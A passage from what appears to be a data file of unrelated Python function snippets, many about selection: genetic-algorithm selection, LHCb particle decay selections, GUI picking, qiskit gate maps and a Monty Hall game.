pList[1][1]-pList[0][1], pList[1][2]-pList[0][2]]\n newPt1 =[pList[0][0] + (vec1[0]*0.05), pList[0][1] + (vec1[1]*0.05), pList[0][2] + (vec1[2]*0.05)]\n vec2 = [pList[1][0] - pList[2][0], pList[1][1] - pList[2][1], pList[1][2] - pList[2][2]]\n newPt2= [pList[2][0] + (vec2[0]*0.05), pList[2][1] + (vec2[1]*0.05), pList[2][2] + (vec2[2]*0.05)]\n pList.insert(1, newPt1)\n pList.insert(3, newPt2)\n if len(pList) == 3:\n vec1 = [pList[1][0]-pList[0][0], pList[1][1]-pList[0][1], pList[1][2]-pList[0][2]]\n newPt1 =[pList[0][0] + (vec1[0]*0.05), pList[0][1] + (vec1[1]*0.05), pList[0][2] + (vec1[2]*0.05)]\n vec2 = [pList[1][0] - pList[2][0], pList[1][1] - pList[2][1], pList[1][2] - pList[2][2]]\n newPt2= [pList[2][0] + (vec2[0]*0.05), pList[2][1] + (vec2[1]*0.05), pList[2][2] + (vec2[2]*0.05)]\n pList.insert(1, newPt1)\n pList.insert(3, newPt2)\n crv = cmds.curve(d=3, p=pList, name=\"newCurve\")\n\n if crvType == 2:\n if len(pList) == 2:\n f = [float(sum(x)/2) for x in zip(*pList)]\n pList.insert(1, f)\n crv = cmds.curve(d=3, ep=pList, name=\"newCurve\")\n\n return(crv)", "def generate_kdtree(self):\n if self.method==2:\n coordinates = self.unassigned_data[0:3,:]\n else:\n coordinates = self.unassigned_data[0:2,:]\n tree = cKDTree(coordinates.T)\n\n return tree", "def createSelector(self,type='select',speed=2.0):\n self.selector = self.loadObject(type, scale=2, parent=render, transparency=True, pos=Point2(0,0), glow=1)\n self.selector.hide()\n ival = self.selector.hprInterval((speed), Vec3(0, 0, 360))\n ival.loop()", "def 选择项目(self, n): # real signature unknown; restored from __doc__\n return self.Select(n)", "def selection(self):\n # create an empty priority queue for the new generation\n newGeneration = PriorityQueue()\n # pick top X of the population to survive\n for c in range(0, self.generation.qsize() / SELECTION_FRACTION):\n # get a chromosome\n chromosome = self.generation.get()\n # put the chromosomes in the new generation\n newGeneration.put(chromosome)\n # keep the new generation\n self.generation = newGeneration", "def createSelector2(self,type='select',speed=2.0):\n self.selector2 = self.loadObject(type, scale=2, parent=render, transparency=True, pos=Point2(0,0), glow=1)\n self.selector2.hide()\n ival = self.selector2.hprInterval((speed), Vec3(0, 0, 360))\n ival.loop()", "def makeDefault(name,inputSel) :\n from Configurables import OfflineVertexFitter\n Detached4mu = CombineParticles(\"Combine\"+name)\n Detached4mu.DecayDescriptor = \"B_s0 -> mu+ mu- mu+ mu-\"\n # Set the OfflineVertexFitter to keep the 4 tracks and not the J/Psi Kstar:\n Detached4mu.addTool( OfflineVertexFitter )\n Detached4mu.ParticleCombiners.update( { \"\" : \"OfflineVertexFitter\"} )\n Detached4mu.OfflineVertexFitter.useResonanceVertex = False\n Detached4mu.ReFitPVs = True\n Detached4mu.DaughtersCuts = { \"mu+\" : \"(TRCHI2DOF < 2.5 ) \"\\\n \" & (MIPCHI2DV(PRIMARY)> 9.)\"}\n \n Detached4mu.CombinationCut = \"(ADAMASS('B_s0')<1000*MeV) \"\\\n \"& (AMAXDOCA('')<0.3*mm)\"\n Detached4mu.MotherCut = \"(VFASPF(VCHI2/VDOF)<9) \"\\\n \"& (BPVDIRA > 0) \"\\\n \"& (BPVVDCHI2>100)\"\\\n \" & (M>4366.3) & (M<6366.3)\"\\\n \"& (BPVIPCHI2()< 25) \"\n \n\n return Selection (name,\n Algorithm = Detached4mu,\n RequiredSelections = inputSel)", "def from_selection(\n class_,\n selection,\n item_class=None,\n ):\n import abjad\n pitch_segment = abjad.PitchSegment.from_selection(selection)\n return class_(\n pitch_segment,\n item_class=item_class,\n )", "def makePseudoPsi( name\n , config\n , DecayDescriptor\n , inputSel\n ) :\n\n _daugCuts = \"(PT> %(D0PtLoose)s*MeV)\" % locals()['config']\n _combCuts = \"(APT> %(D0PtLoose)s*MeV)\" % locals()['config']\n\n _Psi = CombineParticles( DecayDescriptor = DecayDescriptor\n , DaughtersCuts = { \"D0\": _daugCuts }\n , CombinationCut = _combCuts\n , MotherCut = \"(VFASPF(VCHI2PDOF) < 10000)\"\n )\n\n return Selection( name+'Sel',\n Algorithm = _Psi,\n RequiredSelections = inputSel\n )", "def selectPointsUnderCursor(self):\n spw = self.spw\n sw = spw.windows['Sort']\n #if clear:\n # sw.uslist.clearSelection()\n # sw.nlist.clearSelection()\n x, y = self.cursorPosGL()\n sids = self.pick(x, y, pb=10, multiple=True)\n if sids is None:\n return\n #t0 = time.time()\n spw.SelectSpikes(sids, on=self.selecting)\n #print('SelectSpikes took %.3f sec' % (time.time()-t0))\n if self.selecting == True:\n sat = 0.2 # desaturate\n else: # self.selecting == False\n sat = 1 # resaturate\n self.color(sids, sat=sat)\n self.updateGL()", "def get_gold_selection(self, pointer):\n raise NotImplementedError", "def _select(self):\n sel = []\n\n # choose randomly while favouring fit individuals\n lp = len(self.population) // 2\n for _ in range(lp):\n idx1 = idx2 = int(math.sqrt(random.randrange(lp**2+1)))\n while idx1 == idx2:\n idx2 = int(math.sqrt(random.randrange(lp**2+1)))\n\n p1, p2 = self.population[idx1], self.population[idx2]\n sel.append((p1, p2))\n\n return sel", "def select(self):\n\t\tbest_num_components = self.n_constant\n\t\treturn self.base_model(best_num_components)", "def eta23pi ( self ) :\n from GaudiConfUtils.ConfigurableGenerators import DaVinci__N3BodyDecays\n ## \n pre_eta = self.make_selection (\n ## the unique tag \n 'PreEta3Pi' ,\n ## algorithm type to be used\n DaVinci__N3BodyDecays ,\n ## input selections \n [ self.pions () , self.pi0 () ] ,\n ## algorithm properties \n DecayDescriptor = \" eta -> pi+ pi- pi0\" ,\n ## \n Combination12Cut = \"\"\" ( AM < 700 * MeV ) &\n ( ACHI2DOCA(1,2) < 12 ) \n \"\"\" , \n ##\n CombinationCut = \"\"\"\n ( APT > %s ) & ( ADAMASS ( 'eta' ) < 100 * MeV )\n \"\"\" % ( 0.9 * self['ETA_PT'] ) ,\n ##\n MotherCut = \"\"\"\n ( PT > %s ) &\n ( chi2vx < 9 ) \n \"\"\" % self['ETA_PT']\n )\n ##\n from GaudiConfUtils.ConfigurableGenerators import Pi0Veto__Tagger2g\n ## \n return self.make_selection (\n 'Eta23pi' ,\n Pi0Veto__Tagger2g ,\n [ pre_eta ] ,\n MassWindow = 25 * MeV ,\n MassChi2 = -1 ,\n ExtraInfoIndex = 25016 ## unique ! \n )", "def get_selection(self, selection_name, format=None):", "def __init__(self, P, I, D, dt):\n\n\t\tself._Kp = P\n\t\tself._Ki = I\n\t\tself._Kd = D\n\t\tself._dt = dt", "def create_pauli_qiskit(pauli):\n\ttemp = [] # List in which save the weights and the Pauli strings\n\tfor key in pauli.keys(): # Iterate over all the Pauli strings\n\t\ttemp.append([pauli[key], Pauli(key)])\n\treturn WeightedPauliOperator(temp) # Transform the list into a qiskit operator", "def selectPointsUnderCursor(self):\n #spw = self.spw\n #sw = spw.windows['Sort']\n #if clear:\n # sw.uslist.clearSelection()\n # sw.nlist.clearSelection()\n x, y = self.cursorPosGL()\n sids = self.pick(x, y, pb=10, multiple=True)\n if sids == None:\n return\n #t0 = time.time()\n #if not sw.panel.maxed_out:\n # spw.SelectSpikes(sids, on=self.selecting)\n #else:\n # # for speed, while the mouse is held down and the sort panel is maxed out,\n # # don't call SelectSpikes, only call it once when the mouse is released\n self.collected_sids.append(sids)\n #print('SelectSpikes took %.3f sec' % (time.time()-t0))\n if self.selecting == True:\n sat = 0.2 # desaturate\n else: # self.selecting == False\n sat = 1 # resaturate\n self.color(sids, sat=sat)\n self.updateGL()", "def selection(self) -> Chromosome:\n # each chromosome has a fitness, and the lower the fitness, the higher the probability of election\n choices_list = list(range(len(self._population)))\n weights = [1 / chromosome.get_fitness() for chromosome in self._population]\n\n index = choices(choices_list, weights=weights)[0]\n\n return self._population[index]", "def _selectRandomPrototypes(K, n, q):\n G = [] # Vector of prototypes\n elements = range(n) # Index of the elements of E\n for k in range(K):\n Gk = random.sample(elements, q)\n G.append(Gk)\n return G", "def p_selection(p_init, it, n_iters):\n it = int(it / n_iters * 10000)\n\n if 10 < it <= 50:\n p = p_init / 2\n elif 50 < it <= 200:\n p = p_init / 4\n elif 200 < it <= 500:\n p = p_init / 8\n elif 500 < it <= 1000:\n p = p_init / 16\n elif 1000 < it <= 2000:\n p = p_init / 32\n elif 2000 < it <= 4000:\n p = p_init / 64\n elif 4000 < it <= 6000:\n p = p_init / 128\n elif 6000 < it <= 8000:\n p = p_init / 256\n elif 8000 < it <= 10000:\n p = p_init / 512\n else:\n p = p_init\n\n return p", "def fitness_proportional_selection(self) -> List[Character]:\n print(' - selection')\n st = time.time()\n\n # open pool the the amount of cpu cores\n pool = mp.Pool(mp.cpu_count())\n\n # create a character at each position of the characters list\n new_list = pool.map(create_character, [i for i in self.characters])\n\n # close pool and release the cores\n pool.close()\n\n self.characters = new_list\n self.get_diversity()\n self.calc_sum_fitness()\n self.calc_average_fitness()\n self.get_best_fitness()\n self.get_worst_fitness()\n\n # create the wheel as dict with the selection chance and the character\n wheel: Dict[float, Character] = {}\n\n # the new generation\n new_generation: List[Character] = []\n fit_c_generation: float = 0\n new_wheel = {}\n \"\"\"get the chance of all characters to be selected\n \n \"\"\"\n for c in self.characters:\n p_chance = c.fitness / self.sum_fitness\n chance = p_chance * self.size\n s = str(chance)\n s = s.split('.')\n r = int(s[0])\n f_c = '0.' + s[1]\n f_c = float(f_c)\n fit_c_generation += f_c\n if r <= 0:\n wheel[f_c] = c\n while r > 0:\n new_character = copy.deepcopy(c)\n new_generation.append(new_character)\n r -= 1\n\n for k, v in wheel.items():\n new_key = (k / fit_c_generation) * self.size\n new_wheel[new_key] = v\n\n while len(new_generation) < self.size:\n for k in sorted(new_wheel, reverse=True):\n chance = random.uniform(0, fit_c_generation)\n if chance <= k:\n new_character = copy.deepcopy(new_wheel[k])\n new_generation.append(new_character)\n if len(new_generation) >= self.size:\n break\n continue\n e = time.time()\n print(\" - time: \", e - st)\n\n return new_generation", "def select(self):\n\n return self.p[0], self.p[1]", "def __init__(self, k, p, sample_p=1):\n # Maximum sample size\n self.k = k\n\n # A dictionary containing the sampled elements\n # The dictionary key is the key of the element\n # The value is a tuple (seed, count)\n self.elements = {}\n\n # The function of the frequencies that the sketch estimates\n # For now it's the p-th frequency moment, but in the future we may\n # support other functions (passed as a parameter)\n self.func_of_freq = lambda x: x**p\n\n # The power of values used for the sampling weights\n self.sample_p = sample_p", "def selection(probs):\n # pick 2 parents out of this distribution\n t = [i for i in range(len(probs))]\n draw = choice(t, 2, p=probs, replace=False)\n return draw", "def _add_selection ( self , nick , sel ) :\n if not self.__selections_.has_key ( self.name() ) :\n self.__selections_[ self.name() ] = {} \n \n if self.__selections_[ self.name()].has_key( nick ) :\n raise AttributeError , \"Selection '%s'already exists \" % nick\n \n self.__selections_[ self.name() ][ nick ] = sel\n \n return sel", "def makeDstarPartial( name\n , config\n , DecayDescriptor\n , inputSel\n ) :\n\n daugCuts = \"(TRCHI2DOF < %(Daug_TRCHI2DOF_MAX)s)\" % locals()['config']\n combCuts = \"((AM - AM1) < %(Dstar_AMDiff_MAX)s* MeV)\" % locals()['config']\n dstarCuts = \"(VFASPF(VCHI2/VDOF) < %(Dstar_VCHI2VDOF_MAX)s)\" \\\n \"& ((M - M1) < %(Dstar_MDiff_MAX)s* MeV)\" % locals()['config']\n\n _Dstar = CombineParticles( DecayDescriptor = DecayDescriptor\n , DaughtersCuts = { \"pi+\" : daugCuts }\n , CombinationCut = combCuts\n , MotherCut = dstarCuts\n )\n\n return Selection( name+'Sel',\n Algorithm = _Dstar,\n RequiredSelections = inputSel\n )", "def project(record, selected, pkey_name) -> StateDictInterface:\n if selected:\n keys = set(selected.keys()) | {pkey_name}\n return record.projection(keys)\n else:\n return record", "def select(self):\n pass", "def select(self):\n pass", "def build_selection_spec(client_factory, name):\r\n sel_spec = client_factory.create('ns0:SelectionSpec')\r\n sel_spec.name = name\r\n return sel_spec", "def __init__(self, parent):\n # parent is the main frame of PyCorrFit\n self.parent = parent\n ## MYID\n # This ID is given by the parent for an instance of this class\n self.MyID = None\n ## Wrapping\n curvedict, labels = self.GetCurvedict()\n self.labels = labels\n self.Selector = UserSelectCurves(parent, curvedict,\n wrapper=self, labels=labels)\n # This is necessary for parent to deselect and select the tool\n # in the tools menu.\n self.Bind = self.Selector.Bind\n if self.parent.notebook.GetPageCount() == 0:\n self.Selector.sp.Disable()", "def pions ( self ) :\n from GaudiConfUtils.ConfigurableGenerators import FilterDesktop\n ##\n if self['NOPIDHADRONS'] :\n from StandardParticles import StdAllNoPIDsPions as inpts\n pioncut = self['PionCut']\n else :\n from StandardParticles import StdAllLooseANNPions as inpts\n pioncut = \"(%s)&(%s)\" % ( self['PionCut'] , self['PionPIDCut'] ) \n ##\n return self.make_selection (\n 'Pion' ,\n FilterDesktop ,\n [ inpts ] ,\n Code = pioncut ,\n )", "def from_selection(cls):\n guid = compas_rhino.select_mesh()\n return cls.from_guid(guid)", "def make_odorant_selector(name):\n return dcc.Input(\n id=\"cid_%s\" % name,\n placeholder=\"Enter a PubChem ID number...\",\n type=\"number\",\n value=None,\n )", "def _select_single(self, disc):\n return QuadraticFieldClassNumbersTable._select_single(self, -disc)", "def upsilon_pK ( self ) :\n from GaudiConfUtils.ConfigurableGenerators import DaVinci__N3BodyDecays\n #\n return self.make_selection (\n 'Y&pK' ,\n DaVinci__N3BodyDecays ,\n [ self.upsilons() , self.protons() , self.kaons() ] ,\n ## algorithm properties \n DecayDescriptor = \"[Upsilon(4S) -> J/psi(1S) p+ K-]cc\" ,\n Combination12Cut = \"\"\"\n ( AM < 15 * GeV ) &\n ( ACHI2DOCA(1,2) < 16 )\n \"\"\" ,\n CombinationCut = \"\"\"\n ( AM < 15 * GeV ) &\n ( AM23 < 2000 * MeV ) & \n ( ( AM - AM1 - AM23 ) < 2.5 * GeV ) &\n ( ACHI2DOCA(1,3) < 16 ) &\n ( ACHI2DOCA(2,3) < 16 )\n \"\"\" ,\n MotherCut = \" chi2vxndf< 10 \" ,\n )", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\r\n pass", "def select_item(items, weights, k):\n x = random.choices(items, weights=weights, k=k)\n return x", "def makeSelection(self, selection=\"\"):\n\n\t\tif selection == \"\":\n\t\t\tprint \"usage: makeSelection(selection)\"\n\n\t\tsel_string = self.parseMacros(selection)\n\n\t\t# --- split by \";\" --- #\n\t\ttmp = []\n\t\tcols = []\n\t\tcols = sel_string.split(\";\")\n\t\tfor col in cols:\n\t\t\tinverse = False\n\t\t\tif col == \"\":\n\t\t\t\tcontinue\n\n\t\t\ttmp = string.split(col, \"=\")\n\t\t\tif \"!\" in tmp[0]:\n\t\t\t\tinverse = True\n\n\t\t\tif \"resi\" in tmp[0]:\n\t\t\t\tself.parseResI(tmp[1])\n\t\t\t\tself.invresi = inverse\n\t\t\telif \"resn\" in tmp[0]:\n\t\t\t\tself.parseResN(tmp[1])\n\t\t\t\tself.invresn = inverse\n\t\t\telif \"name\" in tmp[0]:\n\t\t\t\tself.parseAtom(tmp[1])\n\t\t\t\tself.invatom = inverse\n\t\t\telif \"element\" in tmp[0]:\n\t\t\t\tself.parseElement(tmp[1])\n\t\t\t\tself.invelement = inverse\t\n\t\t\telif \"chain\" in tmp[0]:\n\t\t\t\tself.parseChain(tmp[1])\n\t\t\t\tself.invchain = inverse\n\t\t\telif \"type\" in tmp[0]:\n\t\t\t\tself.parseType(tmp[1])\n\t\t\t\tself.invtype = inverse\n\t\t\telif \"cat\" in tmp[0]:\n\t\t\t\tself.parseCat(tmp[1])\n\t\t\t\tself.invcat = inverse\n\t\t\telif \"atomid\" in tmp[0]:\n\t\t\t\tself.parseAtomid(tmp[1])\n\t\t\t\tself.invatomid = inverse\n\t\t\telif \"BB\" in tmp[0]:\n\t\t\t\tself.parseAtom(\" N , CA , C , O \")\n\t\t\t\tself.invatom = False\n\t\t\telif \"CEN\" in tmp[0]:\n\t\t\t\tself.parseAtom(\" N , CA , C , O , CB \")\n\t\t\t\tself.invatom = False\n\t\t\telif \"SC\" in tmp[0]:\n\t\t\t\tself.parseAtom(\" N , CA , C , O \")\n\t\t\t\tself.invatom = True\n\t\t\telif \"HET\" in tmp[0]:\n\t\t\t\tself.parseType(\"HETATM\")\n\t\t\t\tself.invtype = inverse\n\t\t\telse:\n\t\t\t\tprint \"unrecognized selector: \",tmp[0]\n\t\t\t\tsys.exit()", "def choose(self, g, c, p):\n ng = copy.deepcopy(g)\n ng[c[0]][c[1]] = p\n return ng", "def __init__(self, r=1, p=3):\n self.p = p\n self.r = r", "def _gen_qiskit_gateset(q_circ):\n return {\n 'H': q_circ.h,\n 'X': q_circ.x,\n 'Y': q_circ.y,\n 'Z': q_circ.z,\n 'SWAP': q_circ.swap,\n 'I': q_circ.iden,\n 'S': q_circ.s,\n 'D-S': q_circ.sdg,\n 'T': q_circ.t,\n 'D-T': q_circ.tdg,\n 'RX': q_circ.rx,\n 'RY': q_circ.ry,\n 'RZ': q_circ.rz,\n 'C-H': q_circ.ch,\n 'CNOT': q_circ.cx,\n 'C-Y': q_circ.cy,\n 'CSIGN': q_circ.cz,\n 'C-RZ': q_circ.crz,\n 'CCNOT': q_circ.ccx,\n 'C-SWAP': q_circ.cswap,\n 'U': q_circ.u3,\n 'U3': q_circ.u3,\n 'U2': q_circ.u2,\n 'U1': q_circ.u1,\n 'U0': q_circ.iden,\n 'PH': q_circ.rz,\n 'RXX': q_circ.rxx,\n 'RZZ': q_circ.rzz,\n 'R': q_circ.r,\n 'MS': q_circ.ms\n }", "def selectVertex(self, addToSelection: bool) -> None:\n ...", "def new_piece(self):\n piece_type = pieces.PieceSelector.select_random_piece()\n return piece_type(game_config.NEXT_PIECE_POSX, game_config.NEXT_PIECE_POSY)", "def __init__(\n self, name: str, values: List[Dict], index: Optional[int] = 0,\n label: Optional[str] = None, help: Optional[str] = None,\n default: Optional[bool] = None, required: Optional[bool] = False,\n group: Optional[str] = None\n ):\n super(Select, self).__init__(\n dtype=PARA_SELECT,\n name=name,\n index=index,\n label=label,\n help=help,\n default=default,\n required=required,\n group=group\n )\n self.values = values", "def touching_choice(self,p):\n\n part = ['head', 'foot1', 'foot2', 'foot3', 'foot4', 'back', 'stomach', 'tail']\n if len(self.select[p]) == 0:\n return random.sample(part,2)\n elif len(self.select[p]) == 1:\n part.remove(self.select[p][0])\n c = random.sample(part,1)\n return [self.select[p][0], c[0]]\n else:\n return random.sample(self.select[p],2)", "def select(self):\n return", "def __init__(self, pvID, pvP, pvQ, pvDescriptor):\n\n # TODO: implement this", "def upsilons ( self ) :\n ##\n from GaudiConfUtils.ConfigurableGenerators import FilterDesktop\n ##\n return self.make_selection (\n 'Upsilon' ,\n FilterDesktop , \n [ self.dimuon () ] , \n ## algorithm parameters \n Code = self['UpsilonCut'] ,\n ## \n ReFitPVs = True\n ##\n )", "def selection(population: list, weights: list):\n\n new_population = list()\n\n for individual in population:\n new_population.append(individual[1])\n\n individuals = choices(new_population, weights=weights, k=2)\n\n return individuals[0], individuals[1]", "def generatePDI(self,level='species',type='richness'):\n if type == 'richness':\n import biodiversity.richness as rich\n pdi = rich(self)\n try:\n return pdi[level]\n except:\n logger.error(\"[biospatial.gbif.taxonomy.distanceToTree] level selected non existent (used %s)\" %level)", "def pool_selected( self, object ):\n\t\tud.debug( ud.ADMIN, ud.INFO, 'UVMM.DW.ps(node_uri=%s)' % self.node_uri)\n\t\tpool_name = object.options.get('pool-name')\n\t\tif not pool_name:\n\t\t\tpool_name = object.options['pool-name'] = 'default'\n\t\tdrive_type = object.options['drive-type']\n\t\ttry:\n\t\t\tif drive_type == 'cdrom':\n\t\t\t\tvols = self.uvmm.storage_pool_volumes(self.node_uri, pool_name, 'cdrom')\n\t\t\telse:\n\t\t\t\tvols = self.uvmm.storage_pool_volumes(self.node_uri, pool_name, 'disk' )\n\t\texcept uvmmd.UvmmError, e:\n\t\t\tvols = ()\n\t\tud.debug(ud.ADMIN, ud.INFO, 'UVMM.DW.ps: volumes=%s' % map(str, vols))\n\t\tchoices = []\n\t\tfor vol in vols:\n\t\t\tbasename = os.path.basename( vol.source )\n\t\t\tif '.' in basename:\n\t\t\t\tsuffix = basename[ basename.rfind( '.' ) + 1 : ]\n\t\t\t\tif suffix in ( 'xml', 'snapshot' ):\n\t\t\t\t\tcontinue\n\t\t\tchoices.append( basename )\n\t\tchoices.sort()\n\t\tself.image_syntax.update_choices( choices )\n\n\t\t# recreate pool button\n\t\tbtn = self._create_pool_select_button( object.options )\n\t\tself[DriveWizard.PAGE_OLD].options[0] = btn\n\t\tself[DriveWizard.PAGE_NEW].options[0] = btn\n\t\t# recreate driver-type button\n\t\titems = [self[DriveWizard.PAGE_NEW].options[2].id(), self[DriveWizard.PAGE_NEW].options[3].id()]\n\t\tbtn = self._create_type_select_button(object.options, items)\n\t\tself[DriveWizard.PAGE_NEW].options[1] = btn\n\n\t\tif drive_type == 'disk':\n\t\t\tself[DriveWizard.PAGE_OLD].hint = None\n\t\telif drive_type in ( 'cdrom', 'floppy' ):\n\t\t\tif self.image_syntax._choices:\n\t\t\t\tmsg = _( \"If the required image is not found it might be added by copying the file into the storage pool, e.g. to /var/lib/libvirt/images/ which is the directory of the storage pool <i>local directory</i>. After that go to the previous page and return to this one. The image should now be listed.\" )\n\t\t\telse:\n\t\t\t\tmsg = _( \"The list of available images is empty! To add an image the file needs to be copied into the storage pool, e.g. to /var/lib/libvirt/images/ which is the directory of the storage pool <i>local directory</i>. After that go to the previous page and return to this one. The image should now be listed.\" )\n\t\t\tself[DriveWizard.PAGE_OLD].hint = msg\n\t\t\tself[DriveWizard.PAGE_OLD].description = ''\n\t\telse:\n\t\t\traise ValueError('Invalid drive-type \"%s\"' % drive_type)\n\n\t\treturn self.type_selected(object)", "def _getAsSelection(self):\n return self._asSelection", "def New(*args, **kargs):\n obj = itkThresholdSegmentationLevelSetImageFilterID2ID2D.__New_orig__()\n import itkTemplate\n itkTemplate.New(obj, *args, **kargs)\n return obj", "def select_operator(operators, weights, rnd_state):\n return rnd_state.choice(np.arange(0, len(operators)),\n p=weights / np.sum(weights))", "def partition_selection():\n if selection is None:\n warning(\"You need to pick something first.\")\n return\n if not selection.obj_type in ['actor','element']:\n warning(\"You need to pick actors or elements.\")\n return\n for A in GD.canvas.actors:\n if not A.atype() == 'TriSurface':\n warning(\"Currently I can only partition TriSurfaces.\" )\n return\n partitionCollection(selection)\n highlightPartitions(selection)", "def __init__(self, selected_points, cut_depth, cut_breadth):\n\n\n self.cut_depth = cut_depth\n self.cut_breadth = cut_breadth\n\n self.points = selected_points\n\n self.vline = self.vlinecomp()\n self.hline = self.ortho_line_cut()\n\n self.mid_left = self.midpoint(0,1)\n self.mid_right = self.midpoint(2, 3)", "def test_non_it(self):\n self.idx = [9, 11, 6, 10, 12, 2, 8, 1, 5, 0, 7, 4, 3]\n selector = PCovCUR(n_to_select=12, iterative=False)\n selector.fit(self.X, self.y)\n\n self.assertTrue(np.allclose(selector.selected_idx_, self.idx[:-1]))", "def getselected_nodes(self):\n self.selected_nodes = {}\n for path in self.options.selected_nodes:\n sel_data = path.rsplit(':', 2)\n path_id = sel_data[0]\n sub_path = int(sel_data[1])\n sel_node = int(sel_data[2])\n if path_id not in self.selected_nodes:\n self.selected_nodes[path_id] = {sub_path: [sel_node]}\n else:\n if sub_path not in self.selected_nodes[path_id]:\n self.selected_nodes[path_id][sub_path] = [sel_node]\n else:\n self.selected_nodes[path_id][sub_path].extend([sel_node])", "def get_selection(self, name):\n print 'hi being selected in plotdata'\n return self.selections.get(name, None)", "def __init__(self, cols, center, radius):\n ColorSelection.__init__(self, cols, center, radius)", "def pdos_select(self, atoms=None, spin=None, l=None, m=None):\n valid_m_values = {'s': [],\n 'p': ['x', 'y', 'z'],\n 'd': ['xy', 'yz', 'z2-r2', 'xz', 'x2-y2'],\n 'f': ['y(3x2-y2)', 'xyz', 'yz2', 'z3', 'xz2', 'z(x2-y2)', 'x(x2-3y2)']}\n if not atoms:\n atom_idx = list(range(self.number_of_atoms))\n else:\n atom_idx = atoms\n to_return = self.pdos_raw[atom_idx, :, :, :]\n if not spin:\n spin_idx = list(range(self.ispin))\n elif spin == 'up':\n spin_idx = [0]\n elif spin == 'down':\n spin_idx = [1]\n elif spin == 'both':\n spin_idx = [0, 1]\n else:\n raise ValueError\n to_return = to_return[:, :, :, spin_idx]\n\n if not l:\n channel_idx = list(range(self.number_of_channels))\n elif l == 's':\n channel_idx = [0]\n elif l == 'p':\n if not m:\n channel_idx = [1, 2, 3]\n else:\n channel_idx = [1 + i for i, v in enumerate(valid_m_values['p']) if v in m]\n elif l == 'd':\n if not m:\n channel_idx = [4, 5, 6, 7, 8]\n else:\n channel_idx = [4 + i for i, v in enumerate(valid_m_values['d']) if v in m]\n elif l == 'f':\n if not m:\n channel_idx = [9, 10, 11, 12, 13, 14, 15]\n else:\n channel_idx = [9 + i for i, v in enumerate(valid_m_values['f']) if v in m]\n else:\n raise ValueError\n\n return to_return[:, :, channel_idx, :]", "def __init__(self):\n super().__init__()\n self.p = 0.0\n self.type = 'Geometric'\n self.distType = 'Discrete'\n self.lowerBound = 0.0\n self.upperBound = 1.0\n self.compatibleQuadrature.append('CDF')\n self.preferredQuadrature = 'CDF'\n self.preferredPolynomials = 'CDF'", "def __init__(self):\n\n self.P = list()\n self.label = 0", "def selectAdd(op):\n doc = op.GetDocument()\n doc.SetActiveObject(op, c4d.SELECTION_ADD)", "def selection(self):\n\n # sort the generation according to fitness.\n self.sortByFitness()\n # get the fitness sum.\n fitnessSum = 0\n for outfit in self.currentGeneration:\n fitnessSum += self.applyFitness(outfit)\n # generate a random number\n stop = random.uniform(0, 1)\n accumulated = 0\n offset = 0\n for outfit in self.currentGenerationSorted:\n fitness = self.applyFitness(outfit) + offset\n probability = fitness / fitnessSum\n accumulated += probability\n\n if stop <= accumulated:\n return outfit", "def make_selection(self, num):\n other_doors = None\n if num is 1:\n other_doors = [str(2), str(3)]\n elif num is 2:\n other_doors = [str(1), str(3)]\n elif num is 3:\n other_doors = [str(1), str(2)]\n\n reveal = str(random.choice(other_doors))\n other_doors.remove(reveal)\n third_door = random.choice(other_doors)\n other_doors.remove(third_door)\n\n main_door = getattr(self, 'door' + str(num) + '_counter')\n door_second = getattr(self, 'door' + reveal + '_counter')\n door_third = getattr(self, 'door' + third_door + '_counter')\n main_door_reveal = getattr(self, 'door'+str(num)+'_reveal')\n\n if (main_door is 0 and door_second is 0\n and door_third is 0):\n self.ids['door'+reveal].source = \\\n getattr(self, 'door'+reveal+'_reveal')\n self.ids['button'+reveal].disabled = True\n inc = getattr(self, 'door' + str(num) + '_counter')\n setattr(self, 'door' + str(num) + '_counter', inc + 1)\n elif main_door is 1 and door_second is 0 and door_third is 0:\n for i in range(1, 4, 1):\n self.ids['door' + str(i)].source = \\\n getattr(self, 'door' + str(i) + '_reveal')\n self.ids['button'+str(i)].disabled = True\n if main_door_reveal in ['door-money.png']:\n self.win_popup()\n else:\n self.lose_popup()\n elif main_door is 0 and (door_second is 1 or door_third is 1):\n for i in range(1, 4, 1):\n self.ids['door' + str(i)].source = \\\n getattr(self, 'door' + str(i) + '_reveal')\n self.ids['button'+str(i)].disabled = True\n if main_door_reveal in ['door-money.png']:\n self.win_popup()\n else:\n self.lose_popup()", "def survivors_selection(self):\n q = 5\n new_population = []\n for i in range(self._population_size):\n batch = []\n for j in range(q):\n r = random.randint(0, (self._child2population_ratio + 1) * self._population_size - 1)\n if r < self._population_size:\n batch.append(self._population[r])\n else:\n batch.append(self._children[r - self._population_size])\n new_population.append(self.select_best(batch))\n\n self._population = new_population", "def selection(self):\r\n if not self._selection:\r\n print(\"not working\")\r\n return None\r\n\r\n year, month = self._date.year, self._date.month\r\n if len(str(month))==1:\r\n month = \"0{}\".format(month)\r\n return (\"{}{}{}\".format(year, month, self._selection[0]), \r\n \"{} / {} / {}\".format(year, month, self._selection[0]))", "def selection(self, name):\n try:\n return self._selections[name]\n except KeyError:\n raise Pype9NameError(\n \"No selection named '{}' (possible '{}')\"\n .format(name, \"', '\".join(self.selection_names)))", "def New(*args, **kargs):\n obj = itkThresholdSegmentationLevelSetImageFilterID3ID3D.__New_orig__()\n import itkTemplate\n itkTemplate.New(obj, *args, **kargs)\n return obj", "def addSelectedToCanvas(self):\n\n selected = self.moduleList.currentItem()\n module = selected.data(QtCore.Qt.UserRole)[0]\n\n index = self.pickerUI.characterTabs.currentIndex()\n widget = self.pickerUI.characterTabs.widget(index)\n characterNode = widget.property(\"charNode\")\n\n # get inst\n modType = cmds.getAttr(module + \".moduleType\")\n modName = cmds.getAttr(module + \".moduleName\")\n mod = __import__(\"RigModules.\" + modType, {}, {}, [modType])\n reload(mod)\n\n # get the class name from that module file (returns RigModules.ART_Root.ART_Root for example)\n moduleClass = getattr(mod, mod.className)\n\n # find the instance of that module\n moduleInst = moduleClass(self, modName)\n self.modules.append(moduleInst)\n\n scene = self.getCurrentCanvasTab()\n\n # find out if charNode has a 